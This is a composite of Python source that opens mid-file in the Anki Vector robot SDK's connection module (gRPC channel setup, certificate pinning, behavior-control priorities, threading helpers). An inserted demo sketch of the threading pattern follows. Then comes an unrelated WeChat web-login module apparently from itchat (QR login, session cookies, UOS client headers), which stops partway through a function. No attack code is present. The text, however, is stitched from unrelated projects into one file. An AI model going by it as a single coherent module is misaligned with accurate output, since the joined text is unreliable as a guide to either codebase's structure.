.escapepod import EscapePod from .exceptions import (connection_error, VectorAsyncException, VectorBehaviorControlException, VectorConfigurationException, VectorControlException, VectorControlTimeoutException, VectorInvalidVersionException, VectorNotFoundException) from .messaging import client, protocol from .version import __version__ class CancelType(Enum): """Enum used to specify cancellation options for behaviors -- internal use only """ #: Cancellable as an 'Action' CANCELLABLE_ACTION = 0 #: Cancellable as a 'Behavior' CANCELLABLE_BEHAVIOR = 1 class ControlPriorityLevel(Enum): """Enum used to specify the priority level for the program.""" #: Runs above mandatory physical reactions, will drive off table, perform while on a slope, #: ignore low battery state, work in the dark, etc. OVERRIDE_BEHAVIORS_PRIORITY = protocol.ControlRequest.OVERRIDE_BEHAVIORS # pylint: disable=no-member #: Runs below Mandatory Physical Reactions such as tucking Vector's head and arms during a fall, #: yet above Trigger-Word Detection. Default for normal operation. DEFAULT_PRIORITY = protocol.ControlRequest.DEFAULT # pylint: disable=no-member #: Holds control of robot before/after other SDK connections #: Used to disable idle behaviors. Not to be used for regular behavior control. RESERVE_CONTROL = protocol.ControlRequest.RESERVE_CONTROL # pylint: disable=no-member class _ControlEventManager: """This manages every :class:`asyncio.Event` that handles the behavior control system. These include three events: granted, lost, and request. :class:`granted_event` represents the behavior system handing control to the SDK. :class:`lost_event` represents a higher priority behavior taking control away from the SDK. :class:`request_event` Is a way of alerting :class:`Connection` to request control. 
""" def __init__(self, loop: asyncio.BaseEventLoop = None, priority: ControlPriorityLevel = None): self._granted_event = asyncio.Event(loop=loop) self._lost_event = asyncio.Event(loop=loop) self._request_event = asyncio.Event(loop=loop) self._has_control = False self._priority = priority self._is_shutdown = False @property def granted_event(self) -> asyncio.Event: """This event is used to notify listeners that control has been granted to the SDK.""" return self._granted_event @property def lost_event(self) -> asyncio.Event: """Represents a higher priority behavior taking control away from the SDK.""" return self._lost_event @property def request_event(self) -> asyncio.Event: """Used to alert :class:`Connection` to request control.""" return self._request_event @property def has_control(self) -> bool: """Check to see that the behavior system has control (without blocking by checking :class:`granted_event`)""" return self._has_control @property def priority(self) -> ControlPriorityLevel: """The currently desired priority for the SDK.""" return self._priority @property def is_shutdown(self) -> bool: """Detect if the behavior control stream is supposed to shut down.""" return self._is_shutdown def request(self, priority: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY) -> None: """Tell the behavior stream to request control via setting the :class:`request_event`. This will signal Connection's :func:`_request_handler` generator to send a request control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`granted_event` parameter. :param priority: The level of control in the behavior system. This determines which actions are allowed to interrupt the SDK execution. See :class:`ControlPriorityLevel` for more information. """ if priority is None: raise VectorBehaviorControlException("Must provide a priority level to request. To disable control, use {}.release().", self.__class__.__name__) self._priority = priority self._request_event.set() def release(self) -> None: """Tell the behavior stream to release control via setting the :class:`request_event` while priority is ``None``. This will signal Connection's :func:`_request_handler` generator to send a release control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`lost_event` parameter. """ self._priority = None self._request_event.set() def update(self, enabled: bool) -> None: """Update the current state of control (either enabled or disabled) :param enabled: Used to enable/disable behavior control """ self._has_control = enabled if enabled: self._granted_event.set() self._lost_event.clear() else: self._lost_event.set() self._granted_event.clear() def shutdown(self) -> None: """Tells the control stream to shut down. This will return control to the rest of the behavior system. """ self._has_control = False self._granted_event.set() self._lost_event.set() self._is_shutdown = True self._request_event.set() class Connection: """Creates and maintains a aiogrpc connection including managing the connection thread. The connection thread decouples the actual messaging layer from the user's main thread, and requires any network requests to be ran using :func:`asyncio.run_coroutine_threadsafe` to make them run on the other thread. Connection provides two helper functions for running a function on the connection thread: :func:`~Connection.run_coroutine` and :func:`~Connection.run_soon`. 
This class may be used to bypass the structures of the python sdk handled by :class:`~anki_vector.robot.Robot`, and instead talk to aiogrpc more directly. The values for the cert_file location and the guid can be found in your home directory in the sdk_config.ini file. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param name: Vector's name in the format of "Vector-XXXX". :param host: The IP address and port of Vector in the format "XX.XX.XX.XX:443". :param cert_file: The location of the certificate file on disk. :param guid: Your robot's unique secret key. :param behavior_control_level: pass one of :class:`ControlPriorityLevel` priority levels if the connection requires behavior control, or None to decline control. """ def __init__(self, name: str, host: str, cert_file: str, guid: str, escape_pod: bool = False, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY): self._loop: asyncio.BaseEventLoop = None self.name = name self.host = host self.cert_file = cert_file self._escape_pod = escape_pod self._interface = None self._channel = None self._has_control = False self._logger = util.get_class_logger(__name__, self) self._control_stream_task = None self._control_events: _ControlEventManager = None self._guid = guid self._thread: threading.Thread = None self._ready_signal: threading.Event = threading.Event() self._done_signal: asyncio.Event = None self._conn_exception = False self._behavior_control_level = behavior_control_level self.active_commands = [] @property def loop(self) -> asyncio.BaseEventLoop: """A direct reference to the loop on the connection thread. Can be used to run functions in on thread. .. testcode:: import anki_vector import asyncio async def connection_function(): print("I'm running in the connection thread event loop.") with anki_vector.Robot() as robot: asyncio.run_coroutine_threadsafe(connection_function(), robot.conn.loop) :returns: The loop running inside the connection thread """ if self._loop is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._loop @property def thread(self) -> threading.Thread: """A direct reference to the connection thread. Available to callers to determine if the current thread is the connection thread. .. testcode:: import anki_vector import threading with anki_vector.Robot() as robot: if threading.current_thread() is robot.conn.thread: print("This code is running on the connection thread") else: print("This code is not running on the connection thread") :returns: The connection thread where all of the grpc messages are being processed. """ if self._thread is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._thread @property def grpc_interface(self) -> client.ExternalInterfaceStub: """A direct reference to the connected aiogrpc interface. This may be used to directly call grpc messages bypassing :class:`anki_vector.Robot` .. 
code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ return self._interface @property def behavior_control_level(self) -> ControlPriorityLevel: """Returns the specific :class:`ControlPriorityLevel` requested for behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This property identifies the enumerated level of behavior control that the SDK will maintain over the robot. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import anki_vector with anki_vector.Robot() as robot: print(robot.conn.behavior_control_level) # Will print ControlPriorityLevel.DEFAULT_PRIORITY robot.conn.release_control() print(robot.conn.behavior_control_level) # Will print None """ return self._behavior_control_level @property def requires_behavior_control(self) -> bool: """True if the :class:`Connection` requires behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This boolean signifies that the :class:`Connection` will try to maintain control of Vector's behavior system even after losing control to higher priority robot behaviors such as returning home to charge a low battery. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import time import anki_vector def callback(robot, event_type, event): robot.conn.request_control() print(robot.conn.requires_behavior_control) # Will print True robot.anim.play_animation_trigger('GreetAfterLongTime') robot.conn.release_control() with anki_vector.Robot(behavior_control_level=None) as robot: print(robot.conn.requires_behavior_control) # Will print False robot.events.subscribe(callback, anki_vector.events.Events.robot_observed_face) # Waits 10 seconds. Show Vector your face. time.sleep(10) """ return self._behavior_control_level is not None @property def control_lost_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has taken control of the behavior system at a higher priority. .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control() """ return self._control_events.lost_event @property def control_granted_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has given control of the behavior system to the SDK program. .. 
testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control """ return self._control_events.granted_event def request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): """Explicitly request behavior control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will acquire control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to gain control before the timeout. For more information about behavior control, see :ref:`behavior <behavior>` .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control(timeout=5.0) :param timeout: The time allotted to attempt a connection, in seconds. :param behavior_control_level: request control of Vector's behavior system at a specific level of control. See :class:`ControlPriorityLevel` for more information. """ if not isinstance(behavior_control_level, ControlPriorityLevel): raise TypeError("behavior_control_level must be of type ControlPriorityLevel") if self._thread is threading.current_thread(): return asyncio.ensure_future(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout), loop=self._loop) return self.run_coroutine(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout)) async def _request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): self._behavior_control_level = behavior_control_level self._control_events.request(self._behavior_control_level) try: self._has_control = await asyncio.wait_for(self.control_granted_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def release_control(self, timeout: float = 10.0): """Explicitly release control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will release control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to receive a control_lost event before the timeout. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control conn.release_control() :param timeout: The time allotted to attempt to release control, in seconds. """ if self._thread is threading.current_thread(): return asyncio.ensure_future(self._release_control(timeout=timeout), loop=self._loop) return self.run_coroutine(self._release_control(timeout=timeout)) async def _release_control(self, timeout: float = 10.0): self._behavior_control_level = None self._control_events.release() try: self._has_control = await asyncio.wait_for(self.control_lost_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def connect(self, timeout: float = 10.0) -> None: """Connect to Vector. 
This will start the connection thread which handles all messages between Vector and Python. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param timeout: The time allotted to attempt a connection, in seconds. """ if self._thread: raise VectorAsyncException("\n\nRepeated connections made to open Connection.") self._ready_signal.clear() self._thread = threading.Thread(target=self._connect, args=(timeout,), daemon=True, name="gRPC Connection Handler Thread") self._thread.start() ready = self._ready_signal.wait(timeout=4 * timeout) if not ready: raise VectorNotFoundException() if hasattr(self._ready_signal, "exception"): e = getattr(self._ready_signal, "exception") delattr(self._ready_signal, "exception") raise e def _connect(self, timeout: float) -> None: """The function that runs on the connection thread. This will connect to Vector, and establish the BehaviorControl stream. """ try: if threading.main_thread() is threading.current_thread(): raise VectorAsyncException("\n\nConnection._connect must be run outside of the main thread.") self._loop = asyncio.new_event_loop() asyncio.set_event_loop(self._loop) self._done_signal = asyncio.Event() if not self._behavior_control_level: self._control_events = _ControlEventManager(self._loop) else: self._control_events = _ControlEventManager(self._loop, priority=self._behavior_control_level) trusted_certs = None if not self.cert_file is None: with open(self.cert_file, 'rb') as cert: trusted_certs = cert.read() else: if not self._escape_pod: raise VectorConfigurationException("Must provide a cert file to authenticate to Vector.") if self._escape_pod: if not EscapePod.validate_certificate_name(self.cert_file, self.name): trusted_certs = EscapePod.get_authentication_certificate(self.host) self.name = EscapePod.get_certificate_name(trusted_certs) self._guid = EscapePod.authenticate_escape_pod(self.host, self.name, trusted_certs) # Pin the robot certificate for opening the channel channel_credentials = aiogrpc.ssl_channel_credentials(root_certificates=trusted_certs) # Add authorization header for all the calls call_credentials = aiogrpc.access_token_call_credentials(self._guid) credentials = aiogrpc.composite_channel_credentials(channel_credentials, call_credentials) self._logger.info(f"Connecting to {self.host} for {self.name} using {self.cert_file}") self._channel = aiogrpc.secure_channel(self.host, credentials, options=(("grpc.ssl_target_name_override", self.name,),)) # Verify the connection to Vector is able to be established (client-side) try: # Explicitly grab _channel._channel to test the underlying grpc channel directly grpc.channel_ready_future(self._channel._channel).result(timeout=timeout) # pylint: disable=protected-access except grpc.FutureTimeoutError as e: raise VectorNotFoundException() from e self._interface = client.ExternalInterfaceStub(self._channel) # Verify Vector and the SDK have compatible protocol versions version = 
protocol.ProtocolVersionRequest(client_version=protocol.PROTOCOL_VERSION_CURRENT, min_host_version=protocol.PROTOCOL_VERSION_MINIMUM) protocol_version = self._loop.run_until_complete(self._interface.ProtocolVersion(version)) if protocol_version.result != protocol.ProtocolVersionResponse.SUCCESS or protocol.PROTOCOL_VERSION_MINIMUM > protocol_version.host_version: # pylint: disable=no-member raise VectorInvalidVersionException(protocol_version) self._control_stream_task = self._loop.create_task(self._open_connections()) # Initialize SDK sdk_module_version = __version__ python_version = platform.python_version() python_implementation = platform.python_implementation() os_version = platform.platform() cpu_version = platform.machine() initialize = protocol.SDKInitializationRequest(sdk_module_version=sdk_module_version, python_version=python_version, python_implementation=python_implementation, os_version=os_version, cpu_version=cpu_version) self._loop.run_until_complete(self._interface.SDKInitialization(initialize)) if self._behavior_control_level: self._loop.run_until_complete(self._request_control(behavior_control_level=self._behavior_control_level, timeout=timeout)) except grpc.RpcError as rpc_error: # pylint: disable=broad-except setattr(self._ready_signal, "exception", connection_error(rpc_error)) self._loop.close() return except Exception as e: # pylint: disable=broad-except # Propagate the errors to the calling thread setattr(self._ready_signal, "exception", e) self._loop.close() return finally: self._ready_signal.set() try: async def wait_until_done(): return await self._done_signal.wait() self._loop.run_until_complete(wait_until_done()) finally: self._loop.close() async def _request_handler(self): """Handles generating messages for the BehaviorControl stream.""" while await self._control_events.request_event.wait(): self._control_events.request_event.clear() if self._control_events.is_shutdown: return priority = self._control_events.priority if priority is None: msg = protocol.ControlRelease() msg = protocol.BehaviorControlRequest(control_release=msg) else: msg = protocol.ControlRequest(priority=priority.value) msg = protocol.BehaviorControlRequest(control_request=msg) self._logger.debug(f"BehaviorControl {MessageToString(msg, as_one_line=True)}") yield msg async def _open_connections(self): """Starts the BehaviorControl stream, and handles the messages coming back from the robot.""" try: async for response in self._interface.BehaviorControl(self._request_handler()): response_type = response.WhichOneof("response_type") if response_type == 'control_granted_response': self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(True) elif response_type == 'control_lost_event': self._cancel_active() self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(False) except futures.CancelledError: self._logger.debug('Behavior handler task was cancelled. This is expected during disconnection.') def _cancel_active(self): for fut in self.active_commands: if not fut.done(): fut.cancel() self.active_commands = [] def close(self): """Clean up the connection, and shut down all the event handlers. Usually this should be invoked by the Robot class when it closes. ..
code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ try: if self._control_events: self._control_events.shutdown() if self._control_stream_task: self._control_stream_task.cancel() self.run_coroutine(self._control_stream_task).result() self._cancel_active() if self._channel: self.run_coroutine(self._channel.close()).result() self.run_coroutine(self._done_signal.set) self._thread.join(timeout=5) except: pass finally: self._thread = None def run_soon(self, coro: Awaitable) -> None: """Schedules the given awaitable to run on the event loop for the connection thread. .. testcode:: import anki_vector import time async def my_coroutine(): print("Running on the connection thread") with anki_vector.Robot() as robot: robot.conn.run_soon(my_coroutine()) time.sleep(1) :param coro: The coroutine, task or any awaitable to schedule for execution on the connection thread. """ if coro is None or not inspect.isawaitable(coro): raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} is not awaitable, so cannot be ran with run_soon.\n") def soon(): try: asyncio.ensure_future(coro) except TypeError as e: raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} could not be ensured as a future.\n") from e if threading.current_thread() is self._thread: self._loop.call_soon(soon) else: self._loop.call_soon_threadsafe(soon) def run_coroutine(self, coro: Awaitable) -> Any: """Runs a given awaitable on the connection thread's event loop. Cannot be called from within the connection thread. .. testcode:: import anki_vector async def my_coroutine(): print("Running on the connection thread") return "Finished" with anki_vector.Robot() as robot: result = robot.conn.run_coroutine(my_coroutine()) :param coro: The coroutine, task or any other awaitable which should be executed. :returns: The result of the awaitable's execution. """ if threading.current_thread() is self._thread: raise VectorAsyncException("Attempting to invoke async from same thread." "Instead you may want to use 'run_soon'") if asyncio.iscoroutinefunction(coro) or asyncio.iscoroutine(coro): return self._run_coroutine(coro) if asyncio.isfuture(coro): async def future_coro(): return await coro return self._run_coroutine(future_coro()) if callable(coro): async def wrapped_coro(): return coro() return self._run_coroutine(wrapped_coro()) raise VectorAsyncException("\n\nInvalid parameter to run_coroutine: {}\n" "This function expects a coroutine, task, or awaitable.".format(type(coro))) def _run_coroutine(self, coro): return asyncio.run_coroutine_threadsafe(coro, self._loop) def on_connection_thread(log_messaging: bool = True, requires_control: bool = True, is_cancellable: CancelType = None) -> Callable[[Coroutine[util.Component, Any, None]], Any]: """A decorator generator used internally to denote which functions will run on the connection thread. 
This unblocks the caller of the wrapped function and allows them to continue running while the messages are being processed. .. code-block:: python import anki_vector class MyComponent(anki_vector.util.Component): @connection._on_connection_thread() async def on_connection_thread(self): # Do work on the connection thread :param log_messaging: True if the log output should include the entire message or just the size. Recommended for large binary return values. :param requires_control: True if the function should wait until behavior control is granted before executing. :param is_cancellable: use a valid enum of :class:`CancelType` to specify the type of cancellation for the function. Defaults to 'None' implying no support for responding to cancellation. :returns: A decorator which has 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`~anki_vector.robot.Robot`, when the robot is an :class:`~anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ def _on_connection_thread_decorator(func: Coroutine) -> Any: """A decorator which specifies a function to be executed on the connection thread :params func: The function to be decorated :returns: There are 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ if not asyncio.iscoroutinefunction(func): raise VectorAsyncException("\n\nCannot define non-coroutine function '{}' to run on connection thread.\n" "Make sure the function is defined using 'async def'.".format(func.__name__ if hasattr(func, "__name__") else func)) @functools.wraps(func) async def log_handler(conn: Connection, func: Coroutine, logger: logging.Logger, *args: List[Any], **kwargs: Dict[str, Any]) -> Coroutine: """Wrap the provided coroutine to better express exceptions as specific :class:`anki_vector.exceptions.VectorException`s, and adds logging to incoming (from the robot) and outgoing (to the robot) messages. """ result = None # TODO: only have the request wait for control if we're not done. If done raise an exception. control = conn.control_granted_event if requires_control and not control.is_set(): if not conn.requires_behavior_control: raise VectorControlException(func.__name__) logger.info(f"Delaying {func.__name__} until behavior control is granted") await asyncio.wait([conn.control_granted_event.wait()], timeout=10) message = args[1:] outgoing = message if log_messaging else "size = {} bytes".format(sys.getsizeof(message)) logger.debug(f'Outgoing {func.__name__}: {outgoing}') try: result = await func(*args, **kwargs) except grpc.RpcError as rpc_error: raise connection_error(rpc_error) from rpc_error incoming = str(result).strip() if log_messaging else "size = {} bytes".format(sys.getsizeof(result)) logger.debug(f'Incoming {func.__name__}: {type(result).__name__} {incoming}') return result @functools.wraps(func) def result(*args: List[Any], **kwargs: Dict[str, Any]) -> Any: """The function that is the result of the decorator. Provides a wrapped function. 
:param _return_future: A hidden parameter which allows the wrapped function to explicitly return a future (default for AsyncRobot) or not (default for Robot). :returns: Based on context this can return the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively.""" self = args[0] # Get the self reference from the function call # if the call supplies a _return_future parameter then override force_async with that. _return_future = kwargs.pop('_return_future', self.force_async) action_id = None if is_cancellable == CancelType.CANCELLABLE_ACTION: action_id = self._get_next_action_id() kwargs['_action_id'] = action_id wrapped_coroutine = log_handler(self.conn, func, self.logger, *args, **kwargs) if threading.current_thread() == self.conn.thread: if self.conn.loop.is_running(): return asyncio.ensure_future(wrapped_coroutine, loop=self.conn.loop) raise VectorAsyncException("\n\nThe connection thread loop is not running, but a " "function '{}' is being invoked on that thread.\n".format(func.__name__ if hasattr(func, "__name__") else func)) future = asyncio.run_coroutine_threadsafe(wrapped_coroutine, self.conn.loop) if is_cancellable == CancelType.CANCELLABLE_ACTION: def user_cancelled_action(fut): if action_id is None: return if fut.cancelled(): self._abort_action(action_id) future.add_done_callback(user_cancelled_action) if is_cancellable == CancelType.CANCELLABLE_BEHAVIOR: def user_cancelled_behavior(fut): if fut.cancelled(): self._abort_behavior() future.add_done_callback(user_cancelled_behavior) if requires_control: self.conn.active_commands.append(future) def clear_when_done(fut): if fut in self.conn.active_commands: self.conn.active_commands.remove(fut) future.add_done_callback(clear_when_done) if _return_future: return future try: return future.result() except futures.CancelledError: self.logger.warning(f"{func.__name__} cancelled because behavior control was lost") return None return result return _on_connection_thread_decorator
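# --- Illustrative sketch (not part of the SDK above) ---------------------------------
# Connection's threading model reduces to a standard asyncio pattern: run an event loop
# on a dedicated daemon thread and submit coroutines to it from other threads with
# asyncio.run_coroutine_threadsafe(), which is what run_coroutine()/run_soon() wrap.
# Everything below is a minimal, self-contained demonstration of that pattern; the
# _demo_* and fake_rpc names are hypothetical and do not exist in anki_vector.
import asyncio
import threading


def _demo_connection_thread_pattern():
    loop = asyncio.new_event_loop()
    ready = threading.Event()

    def _thread_main():
        # The dedicated "connection" thread owns the loop and runs it until stopped.
        asyncio.set_event_loop(loop)
        ready.set()
        loop.run_forever()

    worker = threading.Thread(target=_thread_main, daemon=True, name="demo-connection-thread")
    worker.start()
    ready.wait()

    async def fake_rpc():
        # Stand-in for an awaited gRPC call such as grpc_interface.PlayAnimation(...).
        await asyncio.sleep(0.01)
        return "done"

    # Equivalent of conn.run_coroutine(...): returns a concurrent.futures.Future that
    # the calling thread can block on with .result().
    future = asyncio.run_coroutine_threadsafe(fake_rpc(), loop)
    print(future.result(timeout=1))

    # Equivalent of the shutdown path in close(): stop the loop, join, then close it.
    loop.call_soon_threadsafe(loop.stop)
    worker.join(timeout=1)
    loop.close()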
login.py
import os, time, re, io import threading import json, xml.dom.minidom import random import traceback, logging try: from httplib import BadStatusLine except ImportError: from http.client import BadStatusLine import requests from pyqrcode import QRCode from .. import config, utils from ..returnvalues import ReturnValue from ..storage.templates import wrap_user_dict from .contact import update_local_chatrooms, update_local_friends from .messages import produce_msg logger = logging.getLogger('itchat') def load_login(core): core.login = login core.get_QRuuid = get_QRuuid core.get_QR = get_QR core.check_login = check_login core.web_init = web_init core.show_mobile_login = show_mobile_login core.start_receiving = start_receiving core.get_msg = get_msg core.logout = logout def login(self, enableCmdQR=False, picDir=None, qrCallback=None, loginCallback=None, exitCallback=None): if self.alive or self.isLogging: logger.warning('itchat has already logged in.') return self.isLogging = True while self.isLogging: uuid = push_login(self) if uuid: qrStorage = io.BytesIO() else: logger.info('Getting uuid of QR code.') while not self.get_QRuuid(): time.sleep(1) logger.info('Downloading QR code.') qrStorage = self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback) logger.info('Please scan the QR code to log in.') isLoggedIn = False while not isLoggedIn: status = self.check_login() if hasattr(qrCallback, '__call__'): qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue()) if status == '200': isLoggedIn = True elif status == '201': if isLoggedIn is not None: logger.info('Please press confirm on your phone.') isLoggedIn = None elif status != '408': break time.sleep(1) if isLoggedIn: break elif self.isLogging: logger.info('Log in time out, reloading QR code.') else: return # log in process is stopped by user logger.info('Loading the contact, this may take a little while.') self.web_init() self.show_mobile_login() self.get_contact(True) if hasattr(loginCallback, '__call__'): r = loginCallback() else: utils.clear_screen() if os.path.exists(picDir or config.DEFAULT_QR): os.remove(picDir or config.DEFAULT_QR) logger.info('Login successfully as %s' % self.storageClass.nickName) self.start_receiving(exitCallback) self.isLogging = False def push_login(core): cookiesDict = core.s.cookies.get_dict() if 'wxuin' in cookiesDict: url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % ( config.BASE_URL, cookiesDict['wxuin']) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(url, headers=headers).json() if 'uuid' in r and r.get('ret') in (0, '0'): core.uuid = r['uuid'] return r['uuid'] return False def get_QRuuid(self): url = '%s/jslogin' % config.BASE_URL params = { 'appid' : 'wx782c26e4c19acffb', 'fun' : 'new', 'redirect_uri' : 'https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxnewloginpage?mod=desktop', 'lang' : 'zh_CN' } headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";' data = re.search(regx, r.text) if data and data.group(1) == '200': self.uuid = data.group(2) return self.uuid def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None): uuid = uuid or self.uuid picDir = picDir or config.DEFAULT_QR qrStorage = io.BytesIO() qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid) qrCode.png(qrStorage, scale=10) if hasattr(qrCallback, '__call__'): qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue()) else: with open(picDir, 'wb') as f: 
f.write(qrStorage.getvalue()) if enableCmdQR: utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR) else: utils.print_qr(picDir) return qrStorage def check_login(self, uuid=None): uuid = uuid or self.uuid url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL localTime = int(time.time()) params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % ( uuid, int(-localTime / 1579), localTime) headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.code=(\d+)' data = re.search(regx, r.text) if data and data.group(1) == '200': if process_login_info(self, r.text): return '200' else: return '400' elif data: return data.group(1) else: return '400' def process_login_info(core, loginContent): ''' when finish login (scanning qrcode) * syncUrl and fileUploadingUrl will be fetched * deviceid and msgid will be generated * skey, wxsid, wxuin, pass_ticket will be fetched ''' regx = r'window.redirect_uri="(\S+)";' core.loginInfo['url'] = re.search(regx, loginContent).group(1) headers = { 'User-Agent' : config.USER_AGENT, 'client-version' : config.UOS_PATCH_CLIENT_VERSION, 'extspam' : config.UOS_PATCH_EXTSPAM, 'referer' : 'https://wx.qq.com/?&lang=zh_CN&target=t' } r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False) core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')] for indexUrl, detailedUrl in ( ("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")), ("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")), ("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")), ("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")), ("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))): fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl] if indexUrl in core.loginInfo['url']: core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \ fileUrl, syncUrl break else: core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url'] core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17] core.loginInfo['logintime'] = int(time.time() * 1e3) core.loginInfo['BaseRequest'] = {} cookies = core.s.cookies.get_dict() core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = "" core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = cookies["wxsid"] core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = cookies["wxuin"] core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = core.loginInfo['deviceid'] # A question : why pass_ticket == DeviceID ? 
